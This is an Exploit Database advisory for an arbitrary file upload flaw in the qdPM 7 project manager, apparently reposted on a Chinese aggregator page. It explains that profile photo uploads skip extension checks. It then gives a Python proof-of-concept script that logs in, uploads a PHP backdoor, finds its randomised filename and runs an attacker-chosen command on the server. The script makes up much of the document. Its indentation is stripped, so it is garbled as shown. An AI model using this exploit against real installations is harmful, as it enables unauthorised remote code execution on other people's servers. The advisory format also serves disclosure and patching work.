qdPM 7 – Arbitrary File upload

• Exploit Database
• 18 阅读

• 作者： loneferret
  日期： 2012-06-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19154/

• ######################################################################################
  # Exploit qdPMv.7 Arbitrary File upload
  # Date: June 13th 2012
  # Author: loneferret
  # Version: 7
  # Vendor Url: http://qdpm.net/
  # Tested on: Winddows XP / XAMPP
  ######################################################################################
  # Discovered by: loneferret
  ######################################################################################
  
  # Software description:
  # Free project management tool for small team
  # qdPM is a free web-based project management tool suitable for a small team working on multiple projects. 
  # It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact 
  # using a Ticket System that is integrated into Task management. 
  
  # Vulnerability:
  # Application does not verify the file's extension when uploading an image for a user's profile.
  # Making it possible to upload a small php shell, and accessing it remotely. 
  
  # Note(s): 
  # One needs a valid user account to upload the file. (Client will do)
  # No need to be authenticated to access the file.
  
  # Uploading file:
  # Once logged in, upload file here:
  # Page: /qdPM/index.php/home/myAccount
  
  # Access file:
  # File can be found here:
  # /qdPM/uploads/users/<filename>
  #
  # Note the filename will contain a random number. One need to 
  # to look at the source code from the browser to find it.
  # For example: <input type="file" name="users[photo]" value="171793-backdoor.php" id="users_photo" />
  
  
  
  ----- python script -----
  #!/usr/bin/python
  
  import re, mechanize
  import urllib, sys
  
  print "\n[*] qdPM v.7Remote Code Execution"
  print "[*] Vulnerability discovered by loneferret"
  
  print "[*] Offensive Security - http://www.offensive-security.com\n"
  if (len(sys.argv) != 3):
  print "[*] Usage: poc.py <RHOST> <RCMD>"
  exit(0)
  
  rhost = sys.argv[1]
  rcmd = sys.argv[2]
  
  # Login into site
  try:
  print "[*] Loging in ."
  br = mechanize.Browser()
  br.open("http://%s/qdPM/index.php/home/login" % rhost)
  assert br.viewing_html()
  br.select_form(name="UsersForm")
  br.select_form(nr=0)
  br.form['login[email]'] = "loneferret@test.com"
  br.form['login[password]'] = "123456"
  print "[*] Hope this works"
  br.submit()
  
  except:
  print "[*] Oups..."
  exit(0)
  
  # Upload malicious file
  try:
  print "[*] Uploading shell .."
  br.open("http://%s/qdPM/home/myAccount" % rhost)
  assert br.viewing_html()
  br.select_form(name="UsersAccountForm")
  br.select_form(nr=0)
  br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="users[photo]")
  br.submit(nr=0)
  
  except:
  print "[-] Upload didn't work."
  exit(0)
  
  # Get file name once saved
  try:
  br.select_form(name="UsersAccountForm")
  for form in br.forms():
  filename = form.controls[9].value
  print "[*] Filename is now: " + filename
  
  url = "http://%s/qdPM/uploads/users " % rhost
  url += "/%s?cmd=%s" % (filename,rcmd)
  print "[*] Executing command:\n"
  resp = urllib.urlopen(url)
  print resp.read()
  
  except:
  print "[-] Oups..."
  exit(0)